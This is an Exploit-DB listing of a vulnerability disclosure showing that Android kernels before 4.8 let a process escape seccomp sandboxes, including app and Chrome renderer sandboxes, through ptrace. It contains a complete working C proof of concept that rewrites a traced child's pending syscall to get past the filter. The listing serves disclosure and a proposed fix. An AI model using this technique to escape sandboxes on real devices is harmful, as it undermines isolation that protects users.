Android Kernel < 4.8 - ptrace seccomp Filter Bypass

EDB-ID:

46434

CVE:

N/A




Platform:

Android

Date:

2019-02-20


/*
The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents:

              Before kernel 4.8, the seccomp check will not be run again
              after the tracer is notified.  (This means that, on older ker‐
              nels, seccomp-based sandboxes must not allow use of
              ptrace(2)—even of other sandboxed processes—without extreme
              care; ptracers can use this mechanism to escape from the sec‐
              comp sandbox.)

Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace cannot be considered to be security boundaries.


The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace:

================
===== filter 0 (164 instructions) =====
0001 if arch == AARCH64: [true +2, false +0]
[...]
0010     if nr >= 0x00000069: [true +1, false +0]
0012       if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP
0023       ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo)
0011     if nr >= 0x00000068: [true +18, false +17] -> ret TRAP
0023     ret ALLOW (syscalls: nanosleep, getitimer, setitimer)
[...]
002a if nr >= 0x00000018: [true +7, false +0]
0032   if nr >= 0x00000021: [true +3, false +0]
0036     if nr >= 0x00000024: [true +1, false +0]
0038       if nr >= 0x00000028: [true +106, false +105] -> ret TRAP
00a2       ret ALLOW (syscalls: sync, kill, rename, mkdir)
0037     if nr >= 0x00000022: [true +107, false +106] -> ret TRAP
00a2     ret ALLOW (syscalls: access)
0033   if nr >= 0x0000001a: [true +1, false +0]
0035     if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP
00a2     ret ALLOW (syscalls: ptrace)
0034   if nr >= 0x00000019: [true +110, false +109] -> ret TRAP
00a2   ret ALLOW (syscalls: getuid)
[...]
================

The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace:

================
# Google Breakpad (crash reporter for Chrome) relies on ptrace
# functionality. Without the ability to ptrace, the crash reporter
# tool is broken.
# b/20150694
# https://code.google.com/p/chromium/issues/detail?id=475270
allow isolated_app self:process ptrace;
================

Chrome applies two extra layers of seccomp sandboxing, but these also permit the use of clone and ptrace:
================
===== filter 1 (194 instructions) =====
0001 if arch == AARCH64: [true +2, false +0]
[...]
0002 if arch != ARM: [true +0, false +60] -> ret TRAP
[...]
0074     if nr >= 0x0000007a: [true +1, false +0]
0076       if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP
00c0       ret ALLOW (syscalls: uname)
0075     if nr >= 0x00000079: [true +75, false +74] -> ret TRAP
00c0     ret ALLOW (syscalls: fsync, sigreturn, clone)
[...]
004d   if nr >= 0x0000001a: [true +1, false +0]
004f     if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP
00c0     ret ALLOW (syscalls: ptrace)
[...]
===== filter 2 (449 instructions) =====
0001 if arch != ARM: [true +0, false +1] -> ret TRAP
[...]
00b6         if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid)
00b7         if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace)
01c0         ret TRAP
[...]
007f     if nr >= 0x00000073: [true +0, false +5]
0080       if nr >= 0x00000076: [true +0, false +2]
0081         if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone)
[...]
================

Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process.


To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot):

================
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <err.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <asm/ptrace.h>
#include <sys/uio.h>

/*
 * Kill and reap the forked child, then exit with status 1.
 *
 * Without this, any failure in the parent would leave the child behind in
 * its endless syscall loop.
 *
 * child:       pid of the forked child.
 * saved_errno: errno value of the failing call, or 0 if the failure has no
 *              associated errno (message is then printed errx()-style).
 * what:        short description of the step that failed.
 */
static void die_with_child(pid_t child, int saved_errno, const char *what) {
  kill(child, SIGKILL);
  waitpid(child, NULL, 0);
  if (saved_errno != 0) {
    /* kill()/waitpid() may have clobbered errno; restore it for err(). */
    errno = saved_errno;
    err(1, "%s", what);
  }
  errx(1, "%s", what);
}

/*
 * Proof of concept: fork a child that calls gettid() in a loop, attach to it
 * with ptrace, stop it at its next syscall, rewrite the pending syscall
 * number from gettid to swapon, and let it run. The child prints the result
 * (and errno string) of any call that does not return its own pid.
 *
 * Returns 0 after the demonstration; exits with status 1 on any failure.
 */
int main(void) {
  setbuf(stdout, NULL);

  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    /* Child: never leaves this loop; the parent kills it when done. */
    pid_t my_pid = getpid();
    while (1) {
      errno = 0;
      int res = syscall(__NR_gettid, 0, 0);
      /* Only report calls whose result is not our own pid. */
      if (res != my_pid) {
        printf("%d (%s)\n", res, strerror(errno));
      }
    }
  }

  /* Give the child time to enter its syscall loop. */
  sleep(1);

  int status;
  if (ptrace(PTRACE_ATTACH, child, NULL, NULL))
    die_with_child(child, errno, "ptrace attach");
  if (waitpid(child, &status, 0) != child)
    die_with_child(child, errno, "wait for child");
  if (!WIFSTOPPED(status))
    die_with_child(child, 0, "child did not stop after attach");

  /* Resume the child until its next syscall stop. */
  if (ptrace(PTRACE_SYSCALL, child, NULL, NULL))
    die_with_child(child, errno, "ptrace syscall entry");
  if (waitpid(child, &status, 0) != child)
    die_with_child(child, errno, "wait for child");
  if (!WIFSTOPPED(status))
    die_with_child(child, 0, "child did not stop at syscall");

  /* Read the pending syscall number through the NT_ARM_SYSTEM_CALL regset. */
  int syscallno;
  struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) };
  if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov))
    die_with_child(child, errno, "ptrace getregs");
  printf("seeing syscall %d\n", syscallno);
  if (syscallno != __NR_gettid) die_with_child(child, 0, "not gettid");

  /* Replace the pending gettid with swapon before the child continues. */
  syscallno = __NR_swapon;
  if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov))
    die_with_child(child, errno, "ptrace setregs");

  if (ptrace(PTRACE_DETACH, child, NULL, NULL))
    die_with_child(child, errno, "ptrace detach");
  kill(child, SIGCONT);

  /* Let the child run and print for a while, then clean it up. */
  sleep(5);
  kill(child, SIGKILL);
  waitpid(child, NULL, 0);
  return 0;
}

/*
================

If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached.

For comparison, the following (a straight syscall to swapon()) fails with SIGSYS:

================
#include <unistd.h>
#include <sys/syscall.h>
int main(void) {
  syscall(__NR_swapon, 0, 0);
}
================

Attaching screenshot from connectbot.

I believe that a sensible fix would be to backport the behavior change that occurred in kernel 4.8 to Android's stable branches.
*/